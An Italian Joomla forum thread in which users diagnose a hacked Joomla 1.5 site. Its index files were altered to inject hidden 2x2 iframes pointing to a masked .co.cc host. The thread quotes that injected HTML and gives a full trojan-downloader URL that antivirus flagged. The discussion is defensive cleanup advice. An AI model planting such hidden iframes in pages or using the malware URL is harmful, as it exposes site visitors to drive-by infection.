Joomla.it Forum
Joomla! 1.5.x (versione con supporto terminato) => Joomla! 1.5 => : first100 03 Oct 2010, 10:48:55
-
Salve ragazzi
Ho da qualche giorno questo tipo di errore quando apro il sito:
Parse error: syntax error, unexpected '<' in /web/htdocs/www.miosito.it/home/index.php on line 88
lo stesso errore si presente in amministrazione :
Parse error: syntax error, unexpected '?' in /web/htdocs/www.miosito.it/home/administrator/index.php on line 88
Che cosa è accaduto? il sito può essere stato attaccato da qualche hacker?
Posso correggere l'errore?
Grazie a chi mi aiuterà
-
utilizzo la versione 1.5.15
-
a quanto vedo c'è del codice in più nei file index.php sia del front-end che del back-end, li ho sostituiti con quelli che avevo salvati nel mio pc e sembra sia tutto a posto , ma mi piacerebbe sapere come fanno a fare queste cose, più tardi esamino il codice in più e vediamo cosa c'è
-
First, hanno hakerato il tuo sito!
Leggi questo post: http://forum.joomla.it/index.php/topic,114777.0.html (http://forum.joomla.it/index.php/topic,114777.0.html).
Hanno modificato il file index.php e index.html
Aprili e togli il codice aggiunto da loro come descritto nel post che ti ho segnalato sopra.
Ciao
-
non basta togliere il codice, questo attacco prevede molteplici compromissioni, non ultime quelle locali al pc.
utilizzo la versione 1.5.15
-------------------------------------
quindi inutile, vecchia, obsoleta, bucabile ;) ... ce ne sono altre 5 versioni dopo
vai nella sezione sicurezza e guarda cosa hanno fatto gli altri.
M.
-
Proprio così Mau,
difatti il mio computer ha rilevato e bloccato un
Trojan-Downloader.Java.Agent.hi http://12rret.co.cc/client.zip/a0ee3d65141.class
l'indirizzo è quello contenuto nel codice maligno che viene inserito nei files index
a quali altre compromissioni alludi Mau?
-
..guarda, quando è capitato a me ho preferito reinstallare poichè ovunque erano sparsi pezzetti di codice che era molto difficile individuare ed era inutile andare alla ricerca di files aggiunti, tra quelli di joomla + extensions erano più di 3000.
Ho preso un backup, purtroppo non aggiornatissimo e sono ripartito da lì e quando ho finito è ricapitato... causa? ...probabilmente il trojan che non mi ero preoccupato di ricercare.
Dopo averci sbattuto la testa un po di volte ce l'ho fatta... non è che per me è semplice e per te no... per quello cerco di prevenire piuttosto che curare.
M.
-
Questo è il codice finale di index.php:
/**
* RETURN THE RESPONSE
*/
echo JResponse::toString($mainframe->getCfg('gzip'));
dopo questa istruzione nell'index infetto c'è:
<html><body><iframe src='http://******.co.cc/1/go.php?sid=13' width='2' height='2' frameborder='0'></iframe><iframe src='http://*******.co.cc/1/go.php?sid=11' width='2' height='2' frameborder='0'></iframe></body></html>
Ho messo gli asterischi al nome del sito per evitare che gli facciamo pure pubblicità.
lascio a voi i commenti
-
First, hanno hakerato il tuo sito!
Leggi questo post: http://forum.joomla.it/index.php/topic,114777.0.html (http://forum.joomla.it/index.php/topic,114777.0.html).
Hanno modificato il file index.php e index.html
Aprili e togli il codice aggiunto da loro come descritto nel post che ti ho segnalato sopra.
Ciao
Ciao
ho letto il tuo post ho anche notato che abbiamo lo stesso hosting provider...
praticamente hanno fatto la medesima roba pure a me, io ho ripristinato i due file index.php e sembra essere tutto ok.